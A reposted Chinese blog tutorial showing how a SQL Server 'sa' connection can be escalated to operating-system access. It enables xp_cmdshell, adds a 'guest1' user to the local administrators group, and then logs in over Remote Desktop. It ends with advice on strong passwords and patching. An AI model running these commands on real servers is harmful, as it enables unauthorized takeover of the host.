博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
根据数据库连接,登录操作系统的一个方法
阅读量:4553 次
发布时间:2019-06-08

本文共 657 字,大约阅读时间需要 2 分钟。

如果你用sa帐号与数据库建立了连接,那么你便可以通过如下方法登录操作系统

1、开启xp_cmdshell配置权限

exec sp_configure 
'
show advanced options
',
1
go
reconfigure
go
exec sp_configure 
'
xp_cmdshell
',
1
go
reconfigure
r

2、建立登录帐号

 

exec xp_cmdshell 
'
net user guest1 guest1 /add
'
exec xp_cmdshell 
'
net localgroup administrators guest1 /add
'
exec xp_cmdshell 
'
net user
'

 

 第一行是创建帐号,用户名密码是guest1,第二行将帐号添加到administrators组,第三行显示操作系统内帐号

3、远程桌面连接试试,看是否用上述帐号能够登上远程的操作系统

 以上代码仅做测试使用,如果未成功可能与本地设置有关。

 

总结:

1、sa帐号密码复杂度一定高,破解了sa密码,就相当于进入了操作系统,权限越大,造成的损失就可能越大。

2、数据库连接是可以做很多事情的,所以很多扫描工具,sql server的端口1433是重点扫描的对象 。

3、及时给系统升级,打补丁。不给不法分子以可乘之机,防患于未然。 

 

转载于:https://www.cnblogs.com/supperniu/archive/2011/12/26/2302394.html

你可能感兴趣的文章
Extjs4.2布局——Ext.container.ViewportView
查看>>
二分搜索及其扩展
查看>>
异常汇总
查看>>
python文件逐行读取四种方法
查看>>
列表存储本质以及索引为什么从0开始
查看>>
00_Java基本常识
查看>>
TP5验证规则使用
查看>>
阿里巴巴Java开发手册
查看>>
frambuffer lcd.c
查看>>
java类加载器
查看>>
Tableau修改参考线上显示的标签
查看>>
Unix系统编程()虚拟内存管理
查看>>
最强Mock框架介绍: Mockito
查看>>
Spring Quartz定时器源码 配置文件 多个触发器 - 代码共享
查看>>
MySql外网不能访问设置
查看>>
20170720上课笔记
查看>>
OSG-交互
查看>>
python接口自动化测试框架实现之操作mysq数据库
查看>>
iOS面试题及答案2015.6.7
查看>>
打印沙漏
查看>>